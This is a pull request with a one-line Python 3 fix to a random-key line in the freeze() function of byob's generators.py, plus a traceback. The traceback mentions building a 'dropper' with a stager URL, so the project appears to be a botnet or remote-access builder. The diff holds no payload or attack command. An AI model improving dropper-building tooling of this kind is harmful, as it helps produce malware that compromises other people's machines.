### PR TITLE
fixed TypeError in generators.py

### DIFF
--- a/byob/core/generators.py
+++ b/byob/core/generators.py
@@ -206,7 +206,7 @@ def freeze(filename, icon=None, hidden=None):
     basename = os.path.basename(filename)
     name = os.path.splitext(basename)[0]
     path = os.path.splitdrive(os.path.abspath('.'))[1].replace('\\','/')
-    key = ''.join([random.choice([chr(i) for i in range(48,91) + range(97,123)]) for _ in range(16)])
+    key = ''.join([random.choice([chr(i) for i in list(range(48,91)) + list(range(97,123))]) for _ in range(16)])
 
     imports = []
     with open(filename) as import_file:


### PR DESCRIPTION
fixed TypeError: unsupported operand type(s) for +: 'range' and 'range

`Compiling executable... Traceback (most recent call last): File "client.py", line 434, in <module> main() File "client.py", line 192, in main dropper = _dropper(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=stager) File "client.py", line 416, in _dropper name = generators.freeze(name, icon=options.icon, hidden=kwargs['hidden']) File "C:\Users\User\Downloads\byob-master\byob-master\byob\core\generators.py", line 209, in freeze key = ''.join([random.choice([chr(i) for i in range(48,91) + range(97,123)]) for _ in range(16)]) File "C:\Users\User\Downloads\byob-master\byob-master\byob\core\generators.py", line 209, in <listcomp> key = ''.join([random.choice([chr(i) for i in range(48,91) + range(97,123)]) for _ in range(16)]) TypeError: unsupported operand type(s) for +: 'range' and 'range'`